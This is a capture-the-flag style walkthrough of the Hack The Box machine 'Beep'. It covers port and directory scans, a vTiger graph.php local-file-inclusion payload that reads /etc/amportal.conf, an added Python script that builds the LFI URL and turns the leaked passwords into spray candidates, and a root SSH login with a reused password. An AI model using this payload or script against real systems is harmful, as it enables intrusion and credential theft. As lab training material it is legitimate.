
HTB Beep

Port scanning

nmap

$ nmap -sCV -A -v -Pn -p- --min-rate 5000 10.10.10.7 -oN nmap_result.txt
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: USER EXPIRE(NEVER) APOP TOP IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING RESP-CODES UIDL AUTH-RESP-CODE STLS LOGIN-DELAY(0)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            790/udp   status
|_  100024  1            793/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed OK IMAP4 MULTIAPPEND UNSELECT ID CHILDREN RENAME URLAUTHA0001 ANNOTATEMORE IMAP4rev1 MAILBOX-REFERRALS X-NETSCAPE LIST-SUBSCRIBED CONDSTORE IDLE LITERAL+ LISTEXT ATOMIC THREAD=REFERENCES SORT STARTTLS QUOTA UIDPLUS THREAD=ORDEREDSUBJECT RIGHTS=kxte BINARY NAMESPACE ACL SORT=MODSEQ CATENATE NO
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a:82b6:cf7e:1afa:5284:1c91:60c8:fbc8
|_SHA-1: 800a:c6e7:065e:1198:0187:c452:0d9b:18ef:e557:a09f
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry 
|_/
|_ssl-date: 2024-11-14T17:37:27+00:00; +4s from scanner time.
|_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Elastix - Login page
793/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

Enumerating port 443

$ gobuster dir -u https://10.10.10.7/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 200 -k -f

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/             (Status: 403) [Size: 286]
/admin/               (Status: 302) [Size: 0] [--> config.php]
/static/              (Status: 200) [Size: 1276]
/error/               (Status: 403) [Size: 284]
/var/                 (Status: 200) [Size: 1236]
/lang/                (Status: 200) [Size: 4788]
/images/              (Status: 200) [Size: 29898]
/help/                (Status: 200) [Size: 346]
/themes/              (Status: 200) [Size: 3172]
/libs/                (Status: 200) [Size: 7798]
/mail/                (Status: 200) [Size: 2411]
/modules/             (Status: 200) [Size: 13132]
/panel/               (Status: 200) [Size: 1065]
/icons/               (Status: 200) [Size: 31006]
/configs/             (Status: 200) [Size: 1282]
/mailman/             (Status: 403) [Size: 286]
/pipermail/           (Status: 200) [Size: 698]
/recordings/          (Status: 200) [Size: 5194]
/vtigercrm/           (Status: 200) [Size: 6499]

The HTTPS site is an Elastix login page (nmap's http-title says the same), and the directory listing also turned up /vtigercrm/, the vTiger CRM component bundled with Elastix.

Exploit

LFI

graph.php in the bundled vTiger CRM passes the current_language parameter into a file include. A directory-traversal prefix plus a %00 terminator (older PHP treats the null byte as end of string, dropping whatever suffix the script appends) lets us read /etc/amportal.conf, the FreePBX configuration file that holds the database and Asterisk manager passwords:

$ curl -k "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action"

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
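As an added example, not code from the original post: the script below builds the same traversal + null-byte URL as the curl command above, and parses the amportal.conf text that comes back so that every secret, including the commented-out old passwords, is turned into (user, password) pairs for the credential-reuse step that follows. The target URL and the sample config are taken from the output above; the parser runs on an inline copy of that output, so nothing is fetched unless you call fetch_file() yourself.

```python
"""Rebuild the vtigercrm graph.php LFI URL and harvest credentials from amportal.conf.

Added example for this writeup; not part of Elastix, vTiger or the original post.
"""
import re
import ssl
import urllib.parse
import urllib.request

# Target from the writeup (assumed; change for your own engagement).
BASE_URL = "https://10.10.10.7/vtigercrm/graph.php"

# Constructed copy of the amportal.conf output shown above, used so the
# parser can be exercised offline.
SAMPLE_AMPORTAL = """\
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
"""

# KEY=value, with optional whitespace; values in this file are never quoted.
AMP_LINE = re.compile(r"^\s*([A-Z][A-Z0-9_]*)\s*=\s*(.*?)\s*$")


def build_lfi_url(base_url, target_path, depth=8):
    """Return the LFI URL: eight '../' climb to /, the absolute path is appended
    (giving the '..//etc' seen in the post) and a raw NUL truncates the suffix
    the script would otherwise add. quote() encodes the NUL as %00 and leaves
    '/' and '.' readable."""
    payload = "../" * depth + "/" + target_path.lstrip("/") + "\x00"
    encoded = urllib.parse.quote(payload, safe="/.")
    return f"{base_url}?current_language={encoded}&module=Accounts&action"


def fetch_file(url, timeout=10):
    """Fetch the URL with certificate checks disabled; the box presents a
    self-signed localhost.localdomain cert, as the nmap output shows."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, context=ctx, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def parse_amportal(text):
    """Split the config into live assignments (dict) and commented-out ones (list).
    Commented lines such as '# AMPDBPASS=amp109' are stale passwords and are
    still worth trying, so they are kept rather than dropped."""
    live, stale = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            m = AMP_LINE.match(line.lstrip("#"))
            if m:
                stale.append((m.group(1), m.group(2)))
            continue
        m = AMP_LINE.match(line)
        if m:
            live[m.group(1)] = m.group(2)
    return live, stale


def credential_candidates(live, stale):
    """Pair each account name from the file (plus root) with every distinct
    *PASS value, live passwords first, then the stale commented-out ones."""
    users = [u for u in (live.get("AMPDBUSER"), live.get("AMPMGRUSER"), "root") if u]
    secrets = []
    for key, value in list(live.items()) + stale:
        if key.endswith("PASS") and value and value not in secrets:
            secrets.append(value)
    return [(user, secret) for secret in secrets for user in users]


if __name__ == "__main__":
    url = build_lfi_url(BASE_URL, "/etc/amportal.conf")
    print(url)
    # Against a live target: live, stale = parse_amportal(fetch_file(url))
    live, stale = parse_amportal(SAMPLE_AMPORTAL)
    for user, secret in credential_candidates(live, stale):
        print(f"{user}:{secret}")
```

The candidate list is what you would feed to an SSH password spray; on this box the first live secret paired with root is the one that works, which is exactly the reuse exploited in the next section.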

SSH

Trying the recovered password over SSH: it is rejected for asteriskuser but accepted for root, so the FreePBX database password is reused as the root password. Note that OpenSSH 4.3 only offers legacy key-exchange and host-key algorithms, so a current client may need -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa to connect at all.

$ ssh asteriskuser@10.10.10.7

asteriskuser@10.10.10.7's password: 
Permission denied, please try again.
asteriskuser@10.10.10.7's password: 
$ ssh root@10.10.10.7

root@10.10.10.7's password: 
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

